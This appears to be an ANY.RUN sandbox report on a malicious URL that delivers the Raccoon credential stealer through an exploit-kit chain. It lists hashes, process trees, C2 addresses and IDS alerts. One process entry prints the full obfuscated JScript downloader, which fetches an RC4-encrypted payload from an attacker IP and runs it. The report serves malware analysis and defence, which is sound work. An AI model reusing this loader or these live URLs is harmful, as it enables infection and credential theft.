analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://cryptomoneyinside.xyz/zSkNkBHX?cpm_id=366413405&cpm_cost=0.0011

Full analysis: https://app.any.run/tasks/36c2a5cf-f6bf-437a-89c5-611a0da717d8
Verdict: Malicious activity
Threats:

Raccoon is an info stealer type malware available as a Malware as a Service. It can be obtained for a subscription and costs $200 per month. Raccoon malware has already infected over 100,000 devices and became one of the most mentioned viruses on the underground forums in 2019.

Malware Trends Tracker     >>>
Analysis date: February 21, 2020, 18:44:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
raccoon
stealer
Indicators:
MD5:

BD213633613AD9505E0D36BF300EE517

SHA1:

D96712EF6C826DD055B30A854DEC969A9453E354

SHA256:

F1798CD17785EA3700CB9A26E4AC91DF29C8959A25E631BBB78CE753F62557B5

SSDEEP:

3:N1KdX3cBALvf2OaiCQjoYfn:Cd1iniCQUYf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • pw4khs66.exe (PID: 3096)

    • Starts CMD.EXE for commands execution

      • iexplore.exe (PID: 2772)

    • Connects to CnC server

      • pw4khs66.exe (PID: 3096)

    • Loads dropped or rewritten executable

      • pw4khs66.exe (PID: 3096)

    • Stealing of credential data

      • pw4khs66.exe (PID: 3096)

    • RACCOON was detected

      • pw4khs66.exe (PID: 3096)

    • Actions looks like stealing of personal data

      • pw4khs66.exe (PID: 3096)

    • Downloads executable files from the Internet

      • pw4khs66.exe (PID: 3096)

    • Downloads executable files from IP

      • pw4khs66.exe (PID: 3096)

  • SUSPICIOUS

    • Reads Internet Cache Settings

      • pw4khs66.exe (PID: 3096)

    • Executable content was dropped or overwritten

      • wscript.exe (PID: 2776)
      • pw4khs66.exe (PID: 3096)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 2776)

    • Executes scripts

      • cmd.exe (PID: 1948)

    • Reads the cookies of Google Chrome

      • pw4khs66.exe (PID: 3096)

    • Reads the cookies of Mozilla Firefox

      • pw4khs66.exe (PID: 3096)

    • Searches for installed software

      • pw4khs66.exe (PID: 3096)

    • Connects to server without host name

      • pw4khs66.exe (PID: 3096)

  • INFO

    • Creates files in the user directory

      • iexplore.exe (PID: 2772)
      • iexplore.exe (PID: 2644)

    • Changes internet zones settings

      • iexplore.exe (PID: 2644)

    • Reads internet explorer settings

      • iexplore.exe (PID: 2772)
      • iexplore.exe (PID: 1832)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2644)
      • iexplore.exe (PID: 2772)
      • iexplore.exe (PID: 3188)
      • iexplore.exe (PID: 1832)

    • Application launched itself

      • iexplore.exe (PID: 2644)

    • Reads settings of System Certificates

      • iexplore.exe (PID: 2644)

    • Changes settings of System certificates

      • iexplore.exe (PID: 2644)

    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 2644)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
8
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe cmd.exe no specs wscript.exe cmd.exe no specs #RACCOON pw4khs66.exe iexplore.exe iexplore.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2644"C:\Program Files\Internet Explorer\iexplore.exe" "http://cryptomoneyinside.xyz/zSkNkBHX?cpm_id=366413405&cpm_cost=0.0011"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2772"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2644 CREDAT:267521 /prefetch:2C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
3221225477
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
1948cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="p"+"ow",j=36;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j).slice(1)};function V(k){var y=a(e+"."+e+"Request.5.1");y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinHTTP",Z="cmd",j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(31^<d){var z=1;x+="dll"}else x+=p;s["sav"+"etofile"](x,2);s.Close();f="r";z^&^&(x="regsv"+f+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(x){};q.Deletefile(K);>1.tmp && start wscript //B //E:JScript 1.tmp "vcbdf45" "http://62.109.8.201/?MTQ3NzE2&zbRw&ekypqAhkm=filly&TGbNh=abettor&CSDW=mustard&CEUdDLc=mustard&txH=professional&puEqhMElg=irreverent&TMuyGycs=filly&RkAYRYTXH=community&f2fs=xXfQMvWUbRXQDZ3EKvPcT6NMMVHRGkCL2YidmrHXefjafFWkzrTFTF_6ozKAQgSG6_VtdfJYDVXgi&tfUWj=electrical&JlZdrTZ=accelerator&mqlkDu=neighboring&bkKbnb=difference&t4f4=hCHfQxjlYtbBFkU_6qm2kjdmBObh5XQ9RyNYw1E-5SdELU90Fz1nLckd84hwhGH7mRQ_OJAElkY0Q&LAKjPaNDQ3MzU5" "¤"C:\Windows\system32\cmd.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2776wscript //B //E:JScript 1.tmp "vcbdf45" "http://62.109.8.201/?MTQ3NzE2&zbRw&ekypqAhkm=filly&TGbNh=abettor&CSDW=mustard&CEUdDLc=mustard&txH=professional&puEqhMElg=irreverent&TMuyGycs=filly&RkAYRYTXH=community&f2fs=xXfQMvWUbRXQDZ3EKvPcT6NMMVHRGkCL2YidmrHXefjafFWkzrTFTF_6ozKAQgSG6_VtdfJYDVXgi&tfUWj=electrical&JlZdrTZ=accelerator&mqlkDu=neighboring&bkKbnb=difference&t4f4=hCHfQxjlYtbBFkU_6qm2kjdmBObh5XQ9RyNYw1E-5SdELU90Fz1nLckd84hwhGH7mRQ_OJAElkY0Q&LAKjPaNDQ3MzU5" "¤"C:\Windows\system32\wscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1844"C:\Windows\System32\cmd.exe" /c pw4khs66.exeC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3096pw4khs66.exeC:\Users\admin\AppData\Local\Temp\Low\pw4khs66.exe
cmd.exe
User:
admin
Integrity Level:
LOW
Exit code:
0
3188"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2644 CREDAT:3151111 /prefetch:2C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
1832"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2644 CREDAT:3609872 /prefetch:2C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Total events
7 976
Read events
1 190
Write events
0
Delete events
0

Modification events

No data
Executable files
61
Suspicious files
13
Text files
15
Unknown types
4

Dropped files

PID
Process
Filename
Type
2644iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3096pw4khs66.exeC:\Users\admin\AppData\LocalLow\frAQBc8Wsa
MD5:
SHA256:
3096pw4khs66.exeC:\Users\admin\AppData\LocalLow\1xVPfvJcrg
MD5:
SHA256:
3096pw4khs66.exeC:\Users\admin\AppData\LocalLow\RYwTiizs2t
MD5:
SHA256:
3096pw4khs66.exeC:\Users\admin\AppData\LocalLow\rQF69AzBla
MD5:
SHA256:
3096pw4khs66.exeC:\Users\admin\AppData\LocalLow\x3CF3EDNhm
MD5:
SHA256:
3096pw4khs66.exeC:\Users\admin\AppData\LocalLow\3098htrhpen8ifg0\hv8745939v498h.zip
MD5:
SHA256:
1948cmd.exeC:\Users\admin\AppData\Local\Temp\Low\1.tmptext
MD5:3EC5932782DD332F9E0730A014490A21
SHA256:33DFED91DA24866F05AD6FAFF796DD0164F009177837E069E2565E15F9911BAA
2772iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\8QU1CQCK.txttext
MD5:A8E85F99A25C3FDECFA4F47DB43EA9BE
SHA256:6C038EFB7387E4B94F24FDBB40399D3910C7C99AE8683BCCD136184304FFE462
3096pw4khs66.exeC:\Users\admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dllexecutable
MD5:60ACD24430204AD2DC7F148B8CFE9BDC
SHA256:9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
21
DNS requests
9
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2644
iexplore.exe
GET
200
62.109.8.201:80
http://62.109.8.201/favicon.ico
RU
suspicious
3096
pw4khs66.exe
POST
200
104.155.44.42:80
http://104.155.44.42/gate/log.php
US
text
483 b
malicious
2772
iexplore.exe
GET
302
185.220.35.26:80
http://cryptomoneyinside.xyz/zSkNkBHX?cpm_id=366413405&cpm_cost=0.0011
unknown
suspicious
2644
iexplore.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
1.47 Kb
whitelisted
2772
iexplore.exe
GET
200
62.109.8.201:80
http://62.109.8.201/?MzYwOTYx&VjB&kbA=abettor&wkHwfu=callous&oySZ=difference&BHIP=professional&FaGlDYGQ=filly&kRRGDru=abettor&nLWkCuczW=difference&ySXCUHdY=consignment&srYONXt=dinamic&f2fs=wHnQMvXcJwDGFYbGMvrESaNbNknQA0GPxpH2_drZdZqxKGni1ub5UUSk6FuCEh3&NwghwLAN=disagree&WUnMNjZ=mustard&t4f4=ho_IleLVWPwrkixODfAZpyIZVA18U9fuph0HXyBKahpOG-xSNMg11z6LRVvQ92w&ZVN=consignment&EJRMTUxOTMy
RU
html
41.4 Kb
suspicious
2644
iexplore.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
1.47 Kb
whitelisted
2776
wscript.exe
GET
200
62.109.8.201:80
http://62.109.8.201/?MTQ3NzE2&zbRw&ekypqAhkm=filly&TGbNh=abettor&CSDW=mustard&CEUdDLc=mustard&txH=professional&puEqhMElg=irreverent&TMuyGycs=filly&RkAYRYTXH=community&f2fs=xXfQMvWUbRXQDZ3EKvPcT6NMMVHRGkCL2YidmrHXefjafFWkzrTFTF_6ozKAQgSG6_VtdfJYDVXgi&tfUWj=electrical&JlZdrTZ=accelerator&mqlkDu=neighboring&bkKbnb=difference&t4f4=hCHfQxjlYtbBFkU_6qm2kjdmBObh5XQ9RyNYw1E-5SdELU90Fz1nLckd84hwhGH7mRQ_OJAElkY0Q&LAKjPaNDQ3MzU5
RU
binary
547 Kb
suspicious
3096
pw4khs66.exe
GET
200
104.155.44.42:80
http://104.155.44.42/gate/sqlite3.dll
US
executable
895 Kb
malicious
3096
pw4khs66.exe
GET
200
104.155.44.42:80
http://104.155.44.42/gate/libs.zip
US
compressed
2.70 Mb
malicious
2644
iexplore.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
1.47 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3096
pw4khs66.exe
216.58.205.238:443
drive.google.com
Google Inc.
US
whitelisted
2644
iexplore.exe
62.109.8.201:80
JSC ISPsystem
RU
suspicious
2772
iexplore.exe
62.109.8.201:80
JSC ISPsystem
RU
suspicious
2644
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2772
iexplore.exe
185.220.35.26:80
cryptomoneyinside.xyz
suspicious
2776
wscript.exe
62.109.8.201:80
JSC ISPsystem
RU
suspicious
3096
pw4khs66.exe
172.217.21.193:443
doc-00-24-docs.googleusercontent.com
Google Inc.
US
whitelisted
2644
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
3188
iexplore.exe
62.109.8.201:80
JSC ISPsystem
RU
suspicious
2644
iexplore.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted

DNS requests

Domain
IP
Reputation
cryptomoneyinside.xyz
  • 185.220.35.26
suspicious
api.bing.com
  • 13.107.5.80
whitelisted
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
drive.google.com
  • 216.58.205.238
shared
doc-00-24-docs.googleusercontent.com
  • 172.217.21.193
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted

Threats

PID
Process
Class
Message
2772
iexplore.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
2772
iexplore.exe
A Network Trojan was detected
ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2
2776
wscript.exe
A Network Trojan was detected
ET CURRENT_EVENTS RIG EK URI Struct Jun 13 2017
3096
pw4khs66.exe
A Network Trojan was detected
AV TROJAN Trojan-Spy.MSIL.Stealer.ahp CnC Checkin
3096
pw4khs66.exe
A Network Trojan was detected
STEALER [PTsecurity] Stealer.Raccoon
3096
pw4khs66.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host DLL Request
3096
pw4khs66.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3096
pw4khs66.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3096
pw4khs66.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3096
pw4khs66.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
http://cryptomoneyinside.xyz/zSkNkBHX?cpm_id=366413405&cpm_cost=0.0011